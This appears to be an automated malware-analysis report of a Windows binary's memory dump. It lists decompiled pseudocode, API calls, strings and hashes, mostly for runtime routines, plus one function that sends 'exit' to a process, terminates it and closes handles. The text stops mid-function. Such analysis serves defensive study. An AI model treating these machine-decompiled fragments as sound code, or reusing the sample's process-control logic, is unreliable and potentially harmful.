0x004a1c5c
0x00000000
0x004a1c5c
0x004a1c29
0x004a1c29
0x004a1c2c
0x00000000
0x00000000
0x00000000
0x00000000
0x004a1c2c
0x004a1c27
0x004a1c1f
0x004a1c92
0x004a1c96
0x004a1c96
0x004a1755
0x004a1755
0x004a175e
0x004a1860
0x004a1860
0x00000000
0x004a178d
0x004a178d
0x004a178f
0x004a1792
0x004a1862
0x004a1862
0x004a1865
0x00000000
0x004a1798
0x004a1798
0x004a179d
0x004a17a0
0x004a1a64
0x004a1a68
0x004a17a6
0x004a17ab
0x004a17ae
0x004a17b3
0x004a17ba
0x004a17bf
0x00000000
0x004a17c5
0x004a17cb
0x004a17f7
0x004a17f7
0x004a17fc
0x004a17ff
0x004a186a
0x004a186a
0x004a186d
0x004a1870
0x004a1870
0x004a1873
0x004a1876
0x004a187c
0x004a1a33
0x004a1a33
0x004a1a36
0x00000000
0x004a1a38
0x004a1a38
0x004a1a3c
0x00000000
0x004a1a42
0x004a1a42
0x004a1a45
0x004a1a48
0x004a1a49
0x004a1a4a
0x004a1a4d
0x004a1a4e
0x004a1a51
0x004a1a52
0x004a1a57
0x00000000
0x004a1a57
0x004a1a3c
0x004a1882
0x004a1882
0x004a1886
0x00000000
0x004a188c
0x004a188c
0x004a1893
0x004a18ab
0x004a18ab
0x004a18ae
0x004a18b4
0x004a18c4
0x004a18c9
0x004a18cc
0x004a18cf
0x004a18d2
0x004a18d5
0x004a18d8
0x004a18db
0x004a18e1
0x004a18e1
0x004a18e4
0x004a18e7
0x004a18f6
0x004a18f7
0x004a18f7
0x004a18f9
0x004a18fc
0x004a1902
0x004a1905
0x004a190b
0x004a190d
0x004a1910
0x004a1913
0x004a191c
0x004a191f
0x004a1921
0x004a1921
0x004a1924
0x004a1927
0x004a192a
0x004a192d
0x004a1930
0x004a1935
0x004a1936
0x004a1937
0x004a1938
0x004a1939
0x004a193c
0x004a193e
0x004a1940
0x00000000
0x004a1942
0x004a1942
0x004a1942
0x004a1945
0x004a1948
0x004a194a
0x004a194b
0x004a1950
0x004a1953
0x004a1955
0x00000000
0x00000000
0x004a1957
0x004a1958
0x004a195b
0x004a195d
0x00000000
0x004a195f
0x004a195f
0x004a1962
0x004a1965
0x00000000
0x004a1965
0x00000000
0x004a195d
0x004a1979
0x004a197f
0x004a1983
0x004a19a0
0x004a19a5
0x004a19a5
0x004a19a8
0x004a19a8
0x00000000
0x004a1968
0x004a1968
0x004a1969
0x004a196c
0x004a196f
0x004a1972
0x004a1972
0x00000000
0x004a1977
0x004a1913
0x004a1905
0x004a19ab
0x004a19ae
0x004a19af
0x004a19b2
0x004a19b5
0x004a19b8
0x004a19bb
0x004a19bb
0x004a19c4
0x004a19c7
0x004a19c7
0x004a19c7
0x004a18db
0x004a19c9
0x004a19cd
0x004a19cf
0x004a19d2
0x004a19d8
0x004a19d8
0x004a19d9
0x004a19dd
0x004a1a5a
0x004a1a5a
0x004a1a5f
0x004a1a62
0x00000000
0x00000000
0x00000000
0x00000000
0x004a19df
0x004a19e6
0x004a19eb
0x00000000
0x004a19ed
0x004a19ed
0x004a19f1
0x004a1a03
0x004a1a09
0x004a1a0b
0x004a1a22
0x004a1a26
0x004a1a2c
0x004a1a2d
0x004a1a2f
0x00000000
0x004a1a31
0x00000000
0x004a1a31
0x004a1a0d
0x004a1a12
0x004a1a1d
0x00000000
0x004a1a1d
0x004a19f3
0x004a19f9
0x004a19fb
0x00000000
0x004a19fd
0x004a19fd
0x004a1a01
0x00000000
0x00000000
0x00000000
0x00000000
0x004a1a01
0x004a19fb
0x004a19f1
0x004a19eb
0x004a1895
0x004a1895
0x004a189c
0x00000000
0x004a189e
0x004a189e
0x004a18a5
0x00000000
0x00000000
0x00000000
0x00000000
0x004a18a5
0x004a189c
0x004a1893
0x004a1886
0x004a1801
0x004a1809
0x004a180c
0x004a1811
0x004a1815
0x004a1821
0x00000000
0x004a1823
0x004a1823
0x004a1826
0x004a1828
0x004a1a69
0x004a1a69
0x004a182e
0x004a182e
0x004a1830
0x004a1833
0x004a184f
0x004a1850
0x004a1853
0x004a1856
0x004a1858
0x00000000
0x004a185e
0x00000000
0x004a185e
0x00000000
0x004a1858
0x004a1833
0x004a1a6e
0x004a1a6e
0x004a1a70
0x004a1a71
0x004a1a78
0x004a1a7b
0x004a1a89
0x004a1a8e
0x004a1a93
0x004a1a96
0x004a1a9b
0x004a1a9e
0x004a1aa1
0x004a1aa4
0x004a1aa6
0x004a1aa8
0x004a1aa8
0x004a1aad
0x004a1ab9
0x004a1abf
0x004a1ac4
0x004a1ac7
0x004a1ac8
0x00000000
0x004a1ac8
0x004a1821
0x004a17ee
0x004a17ee
0x004a17f1
0x00000000
0x00000000
0x00000000
0x00000000
0x004a17f1
0x004a17cb
0x004a17bf
0x004a17a0
0x004a1792
0x004a175e

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004A1818
___TypeMatch.LIBVCRUNTIME ref: 004A194B
CatchIt.LIBVCRUNTIME ref: 004A19A0
IsInExceptionSpec.LIBVCRUNTIME ref: 004A1A26
_UnwindNestedFrames.LIBCMT ref: 004A1AAD
CallUnexpected.LIBVCRUNTIME ref: 004A1AC8

Strings

csm, xrefs: 004A17C5
csm, xrefs: 004A1876
csm, xrefs: 004A1758

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 2378971308-393685449
Opcode ID: 1b13ae45695fb3058d400e6f74962d7ef479bdd9b8ffd059acf6acaa26f0f670
Instruction ID: 4ab6f381fd399765fc504cc7a4e68d42dbb66551b00f81a89a874517e2493f57
Opcode Fuzzy Hash: 1b13ae45695fb3058d400e6f74962d7ef479bdd9b8ffd059acf6acaa26f0f670
Instruction Fuzzy Hash: 51C17B71D002099FCF15DFA5C8819AFBBB9BF2A314F44405FE8116B222D339DA51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043E2F9, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0043E2F9(intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v52;
				signed int _v72;
				signed int _v92;
				signed int _t32;
				signed int _t39;
				signed int* _t41;
				signed int _t46;
				signed int* _t48;
				signed int _t53;
				signed int* _t55;
				signed int _t60;
				signed int* _t62;
				intOrPtr* _t77;
				void* _t88;
				signed int* _t90;
				signed int* _t91;
				signed int* _t92;
				signed int* _t93;
				signed int* _t94;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t99;
				intOrPtr* _t100;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;

				_t88 = __edx;
				_t77 = __ecx;
				_t103 = _t113;
				_push(__ecx);
				_push(__ecx);
				_t32 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t32 ^ _t103;
				_t96 = __ecx;
				_t90 = E004A966E();
				if( *((intOrPtr*)(__ecx + 0x14)) >= 0x10) {
					_t96 =  *__ecx;
				}
				 *_t90 =  *_t90 & 0x00000000;
				E004AD09C(_t77, _t96,  &_v12, 0xa);
				_t114 = _t113 + 0xc;
				if(_t96 == _v12) {
					L00488FCD("invalid stoi argument");
					goto L6;
				} else {
					_pop(_t90);
					_pop(_t96);
					if( *_t90 == 0x22) {
						L6:
						E0048900D("stoi argument out of range");
						asm("int3");
						_push(_t103);
						_t104 = _t114;
						_push(_t77);
						_push(_t77);
						_t39 =  *0x4eb018; // 0xa3bb88a6
						_v32 = _t39 ^ _t104;
						_push(_t96);
						_push(_t90);
						_t97 = _t77;
						_t41 = E004A966E();
						__eflags =  *((intOrPtr*)(_t97 + 0x14)) - 0x10;
						_t91 = _t41;
						if( *((intOrPtr*)(_t97 + 0x14)) >= 0x10) {
							_t97 =  *_t97;
						}
						 *_t91 =  *_t91 & 0x00000000;
						E004AD0F4(_t77, _t97,  &_v16, 0xa);
						_t115 = _t114 + 0xc;
						__eflags = _t97 - _v16;
						if(_t97 == _v16) {
							L00488FCD("invalid stoul argument");
							goto L12;
						} else {
							__eflags =  *_t91 - 0x22;
							_pop(_t91);
							_pop(_t97);
							if( *_t91 == 0x22) {
								L12:
								E0048900D("stoul argument out of range");
								asm("int3");
								_push(_t104);
								_t105 = _t115;
								_push(_t77);
								_push(_t77);
								_t46 =  *0x4eb018; // 0xa3bb88a6
								_v52 = _t46 ^ _t105;
								_push(_t97);
								_push(_t91);
								_t98 = _t77;
								_t48 = E004A966E();
								__eflags =  *((intOrPtr*)(_t98 + 0x14)) - 0x10;
								_t92 = _t48;
								if( *((intOrPtr*)(_t98 + 0x14)) >= 0x10) {
									_t98 =  *_t98;
								}
								 *_t92 =  *_t92 & 0x00000000;
								E004AD0C8(_t77, _t98,  &_v20, 0xa);
								_t116 = _t115 + 0xc;
								__eflags = _t98 - _v20;
								if(_t98 == _v20) {
									L00488FCD("invalid stoll argument");
									goto L18;
								} else {
									__eflags =  *_t92 - 0x22;
									_pop(_t92);
									_pop(_t98);
									if( *_t92 == 0x22) {
										L18:
										E0048900D("stoll argument out of range");
										asm("int3");
										_push(_t105);
										_t106 = _t116;
										_push(_t77);
										_push(_t77);
										_t53 =  *0x4eb018; // 0xa3bb88a6
										_v72 = _t53 ^ _t106;
										_push(_t98);
										_push(_t92);
										_t99 = _t77;
										_t55 = E004A966E();
										__eflags =  *((intOrPtr*)(_t99 + 0x14)) - 0x10;
										_t93 = _t55;
										if( *((intOrPtr*)(_t99 + 0x14)) >= 0x10) {
											_t99 =  *_t99;
										}
										 *_t93 =  *_t93 & 0x00000000;
										E004AD120(_t77, _t99,  &_v24, 0x10);
										_t117 = _t116 + 0xc;
										__eflags = _t99 - _v24;
										if(_t99 == _v24) {
											L00488FCD("invalid stoull argument");
											goto L24;
										} else {
											__eflags =  *_t93 - 0x22;
											_pop(_t93);
											_pop(_t99);
											if( *_t93 == 0x22) {
												L24:
												E0048900D("stoull argument out of range");
												asm("int3");
												_push(_t106);
												_t107 = _t117;
												_push(_t77);
												_push(_t77);
												_t60 =  *0x4eb018; // 0xa3bb88a6
												_v92 = _t60 ^ _t107;
												_push(_t99);
												_push(_t93);
												_t100 = _t77;
												_t62 = E004A966E();
												__eflags =  *((intOrPtr*)(_t100 + 0x14)) - 8;
												_t94 = _t62;
												if( *((intOrPtr*)(_t100 + 0x14)) >= 8) {
													_t100 =  *_t100;
												}
												 *_t94 =  *_t94 & 0x00000000;
												E004AD178(_t77, _t100,  &_v28, 0xa);
												__eflags = _t100 - _v28;
												if(_t100 == _v28) {
													L00488FCD("invalid stoll argument");
													goto L30;
												} else {
													__eflags =  *_t94 - 0x22;
													_pop(_t94);
													_pop(_t100);
													if( *_t94 == 0x22) {
														L30:
														E0048900D("stoll argument out of range");
														asm("int3");
														_push(8);
														L0049D90B(0x4c567f, _t94, _t100);
														_t101 = _t77;
														_v40 = _t77;
														_v36 = _v36 & 0x00000000;
														L00481E8C(_t77, _t88, _t94, _t77, __eflags);
														_t29 =  &_v24;
														 *_t29 = _v24 & 0x00000000;
														__eflags =  *_t29;
														_v36 = 1;
														return L0049D8D4(_t101);
													} else {
														__eflags = _v24 ^ _t107;
														return L0049CE1D(_v24 ^ _t107);
													}
												}
											} else {
												__eflags = _v20 ^ _t106;
												return L0049CE1D(_v20 ^ _t106);
											}
										}
									} else {
										__eflags = _v16 ^ _t105;
										return L0049CE1D(_v16 ^ _t105);
									}
								}
							} else {
								__eflags = _v12 ^ _t104;
								return L0049CE1D(_v12 ^ _t104);
							}
						}
					} else {
						return L0049CE1D(_v8 ^ _t103);
					}
				}
			}

0x0043e2f9
0x0043e2f9
0x0043e2fa
0x0043e2fc
0x0043e2fd
0x0043e2fe
0x0043e305
0x0043e30a
0x0043e315
0x0043e317
0x0043e319
0x0043e319
0x0043e31b
0x0043e325
0x0043e32a
0x0043e330
0x0043e34a
0x00000000
0x0043e332
0x0043e335
0x0043e336
0x0043e337
0x0043e34f
0x0043e354
0x0043e359
0x0043e35a
0x0043e35b
0x0043e35d
0x0043e35e
0x0043e35f
0x0043e366
0x0043e369
0x0043e36a
0x0043e36b
0x0043e36d
0x0043e372
0x0043e376
0x0043e378
0x0043e37a
0x0043e37a
0x0043e37c
0x0043e386
0x0043e38b
0x0043e38e
0x0043e391
0x0043e3ab
0x00000000
0x0043e393
0x0043e393
0x0043e396
0x0043e397
0x0043e398
0x0043e3b0
0x0043e3b5
0x0043e3ba
0x0043e3bb
0x0043e3bc
0x0043e3be
0x0043e3bf
0x0043e3c0
0x0043e3c7
0x0043e3ca
0x0043e3cb
0x0043e3cc
0x0043e3ce
0x0043e3d3
0x0043e3d7
0x0043e3d9
0x0043e3db
0x0043e3db
0x0043e3dd
0x0043e3e7
0x0043e3ec
0x0043e3ef
0x0043e3f2
0x0043e40c
0x00000000
0x0043e3f4
0x0043e3f4
0x0043e3f7
0x0043e3f8
0x0043e3f9
0x0043e411
0x0043e416
0x0043e41b
0x0043e41c
0x0043e41d
0x0043e41f
0x0043e420
0x0043e421
0x0043e428
0x0043e42b
0x0043e42c
0x0043e42d
0x0043e42f
0x0043e434
0x0043e438
0x0043e43a
0x0043e43c
0x0043e43c
0x0043e43e
0x0043e448
0x0043e44d
0x0043e450
0x0043e453
0x0043e46d
0x00000000
0x0043e455
0x0043e455
0x0043e458
0x0043e459
0x0043e45a
0x0043e472
0x0043e477
0x0043e47c
0x0043e47d
0x0043e47e
0x0043e480
0x0043e481
0x0043e482
0x0043e489
0x0043e48c
0x0043e48d
0x0043e48e
0x0043e490
0x0043e495
0x0043e499
0x0043e49b
0x0043e49d
0x0043e49d
0x0043e49f
0x0043e4a9
0x0043e4b1
0x0043e4b4
0x0043e4ce
0x00000000
0x0043e4b6
0x0043e4b6
0x0043e4b9
0x0043e4ba
0x0043e4bb
0x0043e4d3
0x0043e4d8
0x0043e4dd
0x0043e4de
0x0043e4e5
0x0043e4ea
0x0043e4ec
0x0043e4ef
0x0043e4f3
0x0043e4f8
0x0043e4f8
0x0043e4f8
0x0043e4fc
0x0043e50a
0x0043e4bd
0x0043e4c0
0x0043e4c8
0x0043e4c8
0x0043e4bb
0x0043e45c
0x0043e45f
0x0043e467
0x0043e467
0x0043e45a
0x0043e3fb
0x0043e3fe
0x0043e406
0x0043e406
0x0043e3f9
0x0043e39a
0x0043e39d
0x0043e3a5
0x0043e3a5
0x0043e398
0x0043e339
0x0043e344
0x0043e344
0x0043e337

APIs

Part of subcall function 00488FCD: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00488FD9

Part of subcall function 0048900D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00489019

__EH_prolog3.LIBCMT ref: 0043E4E5

Part of subcall function 00481E8C: __EH_prolog3_GS.LIBCMT ref: 00481E93

Strings

invalid stoull argument, xrefs: 0043E468
stoi argument out of range, xrefs: 0043E34F
invalid stoll argument, xrefs: 0043E407, 0043E4C9
invalid stoul argument, xrefs: 0043E3A6
invalid stoi argument, xrefs: 0043E345
stoul argument out of range, xrefs: 0043E3B0
stoll argument out of range, xrefs: 0043E411, 0043E4D3
stoull argument out of range, xrefs: 0043E472

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$H_prolog3H_prolog3_
String ID: invalid stoi argument$invalid stoll argument$invalid stoul argument$invalid stoull argument$stoi argument out of range$stoll argument out of range$stoul argument out of range$stoull argument out of range
API String ID: 3311459110-713895927
Opcode ID: 74c82ef38a882ccaea86cd491ec0dbffc818294eb6a7d3a46d34aa31cfbf922d
Instruction ID: 71a53767b0b32d58ad89a8a73b3650285488d8a52666623cfe33ea411ebaff05
Opcode Fuzzy Hash: 74c82ef38a882ccaea86cd491ec0dbffc818294eb6a7d3a46d34aa31cfbf922d
Instruction Fuzzy Hash: C051E831A01318BBCF24BF569842ADEB7A8DF19715F50046FF50167281DB786F448BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00492B0B, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00492B0B(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr _t36;
				signed int _t45;
				intOrPtr _t51;
				intOrPtr _t52;
				signed int _t53;
				intOrPtr _t65;
				void* _t66;

				_t52 = __ecx;
				_push(0x64);
				E0049D93F(0x4d6dcb, __edi, __esi);
				_t51 = _t52;
				 *((intOrPtr*)(_t66 - 0x6c)) = E004A5AB9();
				_t32 = E00489787(_t66 - 0x68);
				_t53 = 0xb;
				 *((intOrPtr*)(_t66 - 0x70)) = _t51;
				memcpy(_t66 - 0x3c, _t32, _t53 << 2);
				 *((intOrPtr*)(_t51 + 8)) = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((intOrPtr*)(_t51 + 0x14)) = 0;
				 *((intOrPtr*)(_t66 - 4)) = 0;
				E00489787(_t66 - 0x68);
				_t72 =  *((char*)(_t66 + 0xc));
				_t36 = 0x40f063;
				_t65 =  *((intOrPtr*)(_t66 - 0x6c));
				if( *((char*)(_t66 + 0xc)) == 0) {
					_t36 =  *((intOrPtr*)(_t65 + 8));
				}
				_push(_t66 - 0x68);
				_push(0);
				 *((intOrPtr*)(_t51 + 8)) = E004302EE(0, _t65, _t66, _t72, _t36);
				 *((intOrPtr*)(_t51 + 0x10)) = E0048BD4A(_t51, 0, _t65, "false", 0, _t66 - 0x3c);
				 *((intOrPtr*)(_t51 + 0x14)) = E0048BD4A(_t51, 0, _t65, "true", 0, _t66 - 0x3c);
				if( *((char*)(_t66 + 0xc)) == 0) {
					 *((short*)(_t51 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x30))));
					_t45 =  *( *(_t65 + 0x34)) & 0x0000ffff;
				} else {
					 *((short*)(_t51 + 0xc)) = E0048BD19(0x2e, 0, _t66 - 0x3c);
					_t45 = E0048BD19(0x2c, 0, _t66 - 0x3c) & 0x0000ffff;
				}
				 *(_t51 + 0xe) = _t45;
				return E0049D8E9(_t45, 0, _t65);
			}

0x00492b0b
0x00492b0b
0x00492b12
0x00492b17
0x00492b1e
0x00492b25
0x00492b2c
0x00492b2f
0x00492b35
0x00492b39
0x00492b3c
0x00492b3f
0x00492b45
0x00492b49
0x00492b4e
0x00492b52
0x00492b57
0x00492b5c
0x00492b5e
0x00492b5e
0x00492b64
0x00492b65
0x00492b6c
0x00492b7e
0x00492b93
0x00492b9a
0x00492bc6
0x00492bcd
0x00492b9c
0x00492ba8
0x00492bbb
0x00492bbb
0x00492bd0
0x00492bd9

APIs

__EH_prolog3_GS.LIBCMT ref: 00492B12
__Getcvt.LIBCPMT ref: 00492B25
__Getcvt.LIBCPMT ref: 00492B49
_Maklocstr.LIBCPMT ref: 00492B79
_Maklocstr.LIBCPMT ref: 00492B8B
_Maklocchr.LIBCPMT ref: 00492BA3
_Maklocchr.LIBCPMT ref: 00492BB3

Strings

false, xrefs: 00492B74
true, xrefs: 00492B86

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: GetcvtMaklocchrMaklocstr$H_prolog3_
String ID: false$true
API String ID: 2216850052-2658103896
Opcode ID: e2c152e515eaef73037f29a6c9cfef2cbd42cdc5cc6331b558b2b720d14ae12c
Instruction ID: 2a239c2cf79fc622d80201eabdf07e698bc5d1c3e54d0d17c90031374c8ad774
Opcode Fuzzy Hash: e2c152e515eaef73037f29a6c9cfef2cbd42cdc5cc6331b558b2b720d14ae12c
Instruction Fuzzy Hash: 5B215CB1C00344AEDF14EFA2C885A9EBBA8EF44704F00846BF8159F252D7789944CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004B3527, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004B3527(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x406610) {
					E004B2FCF(_t52);
					_t26 = _a4;
				}
				E004B2FCF( *((intOrPtr*)(_t26 + 0x3c)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x30)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x34)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x38)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x28)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x2c)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x40)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x44)));
				E004B2FCF( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E004B33ED(5,  &_v8);
				_v8 =  &_a4;
				return E004B343D(4,  &_v8);
			}

0x004b352d
0x004b3530
0x004b3538
0x004b353b
0x004b3540
0x004b3543
0x004b3547
0x004b3552
0x004b355d
0x004b3568
0x004b3573
0x004b357e
0x004b3589
0x004b3594
0x004b35a2
0x004b35aa
0x004b35b3
0x004b35bb
0x004b35cf

APIs

_free.LIBCMT ref: 004B353B

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

_free.LIBCMT ref: 004B3547
_free.LIBCMT ref: 004B3552
_free.LIBCMT ref: 004B355D
_free.LIBCMT ref: 004B3568
_free.LIBCMT ref: 004B3573
_free.LIBCMT ref: 004B357E
_free.LIBCMT ref: 004B3589
_free.LIBCMT ref: 004B3594
_free.LIBCMT ref: 004B35A2

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d552b49bb115acebe265480194c3efac65798df868a2d2a4c9b8261561751842
Instruction ID: e988418e3e9fb48537df3c9a35a01565191db5c941df199364002db7ffe31753
Opcode Fuzzy Hash: d552b49bb115acebe265480194c3efac65798df868a2d2a4c9b8261561751842
Instruction Fuzzy Hash: 1011B975100108BFCB01FF56C942CED7BB6EF04354B4145ABF9084F666DA75DE50AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004C0F1D, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

RtlDecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004C32AF), ref: 004C0F40

Strings

exp, xrefs: 004C1005, 004C1067
log, xrefs: 004C0FE6, 004C0FF2
acos, xrefs: 004C10B8
sqrt, xrefs: 004C10C4
asin, xrefs: 004C10AC
pow, xrefs: 004C1024, 004C10D0, 004C10E3
log10, xrefs: 004C0F8A, 004C0FDA

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 16842885ca7da441a918869e7be9ea4f28eaa452a0fbe1447d7651bed7077456
Instruction ID: 089692f87df4d9f313d86d2e19478acffbcdab62dbf457d683826a70f714209e
Opcode Fuzzy Hash: 16842885ca7da441a918869e7be9ea4f28eaa452a0fbe1447d7651bed7077456
Instruction Fuzzy Hash: 0051717890020ACBCF54DF65E988AAD7BB0FF0A304F15419FE481A6765CB798D64C71D

Uniqueness

Uniqueness Score: -1.00%

Function 0043BAE8, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043BAE8(void* __ecx, void* __eflags) {
				signed int _v8;
				char _v12;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t34;
				void* _t37;

				_t37 = __eflags;
				_t35 = "exit\r\n";
				_t34 = __ecx;
				E0042CF8F(_t34, "exit\r\n", E004A5AF0("exit\r\n"));
				_v8 = _v8 & 0x00000000;
				_v12 = 0x3e8;
				E00437AAC( &_v12, _t37);
				E00443CE6( &_v36,  *((intOrPtr*)(_t34 + 0x9c)), _t34, _t35, _t37);
				E0042CED4( &_v36);
				 *(_t34 + 0x4f0) =  *(_t34 + 0x4f0) & 0x00000000;
				CloseHandle( *(_t34 + 0x98));
				CloseHandle( *(_t34 + 0x94));
				CloseHandle( *(_t34 + 0xa4));
				CloseHandle( *(_t34 + 0xa8));
				CloseHandle( *(_t34 + 0xac));
				return CloseHandle( *(_t34 + 0xb0));
			}

0x0043bae8
0x0043baf0
0x0043baf5
0x0043bb02
0x0043bb07
0x0043bb0e
0x0043bb15
0x0043bb23
0x0043bb2b
0x0043bb36
0x0043bb43
0x0043bb4b
0x0043bb53
0x0043bb5b
0x0043bb63
0x0043bb70

APIs

_strlen.LIBCMT ref: 0043BAF8

Part of subcall function 00443CE6: __EH_prolog3.LIBCMT ref: 00443CED
Part of subcall function 00443CE6: GetCurrentProcessId.KERNEL32(00000008,0043BB28,exit,00000000), ref: 00443CFE
Part of subcall function 00443CE6: OpenProcess.KERNEL32(00000001,00000000), ref: 00443D10
Part of subcall function 00443CE6: TerminateProcess.KERNEL32(00000000,00000000), ref: 00443D1A
Part of subcall function 00443CE6: CloseHandle.KERNEL32(00000000), ref: 00443D23

CloseHandle.KERNEL32 ref: 0043BB43
CloseHandle.KERNEL32(?), ref: 0043BB4B
CloseHandle.KERNEL32(?), ref: 0043BB53
CloseHandle.KERNEL32(?), ref: 0043BB5B
CloseHandle.KERNEL32(?), ref: 0043BB63
CloseHandle.KERNEL32(?), ref: 0043BB6B

Strings

exit, xrefs: 0043BAF0, 0043BAF7, 0043BAFF

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$Process$CurrentH_prolog3OpenTerminate_strlen
String ID: exit
API String ID: 1932557450-1626635026
Opcode ID: b6093c78575b960b38b393e7e6e8733e26d30affa2d1f4f61cb23dddf96892b3
Instruction ID: b0d2d67e799d78f1287fb172f39e96d9eab677788930a27f6c6e6bc2cf11ccef
Opcode Fuzzy Hash: b6093c78575b960b38b393e7e6e8733e26d30affa2d1f4f61cb23dddf96892b3
Instruction Fuzzy Hash: 46017C31A10529BBDB09AB32DC45BEEFF2AFF41224F00022AE01822161CF742925CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00442A4C, Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Pdh.dll,PdhAddEnglishCounterA), ref: 00442A76
GetProcAddress.KERNEL32(00000000), ref: 00442A7D

Strings

Pdh.dll, xrefs: 00442A71
VI, xrefs: 00442A9C
{I, xrefs: 00442A66
\Processor(_Total)\% Processor Time, xrefs: 00442A89
qI, xrefs: 00442AB2
PdhAddEnglishCounterA, xrefs: 00442A6C

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Pdh.dll$PdhAddEnglishCounterA$VI$\Processor(_Total)\% Processor Time$qI${I
API String ID: 1646373207-4157655863
Opcode ID: 54dc385a2d833a71d727e6ec439f8f6a3d39d49b965bd391f629ea89eff9a151
Instruction ID: 0b081bc49adf17a7202b020135f6c4d0a085b61d7a7cb1a05cdbac2c7f856ed2
Opcode Fuzzy Hash: 54dc385a2d833a71d727e6ec439f8f6a3d39d49b965bd391f629ea89eff9a151
Instruction Fuzzy Hash: 66F0C831500644BFCB11BFB5EC49DABBFB8EF08742B204072B511A50E2CA355A48CBEC

Uniqueness

Uniqueness Score: -1.00%

Function 004BC505, Relevance: 13.7, APIs: 9, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004BC505(signed int _a4, signed int _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t68;
				signed int _t69;
				signed int _t73;
				signed int* _t75;
				signed int _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t98;
				intOrPtr* _t99;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				void* _t119;
				signed int _t121;
				void* _t124;
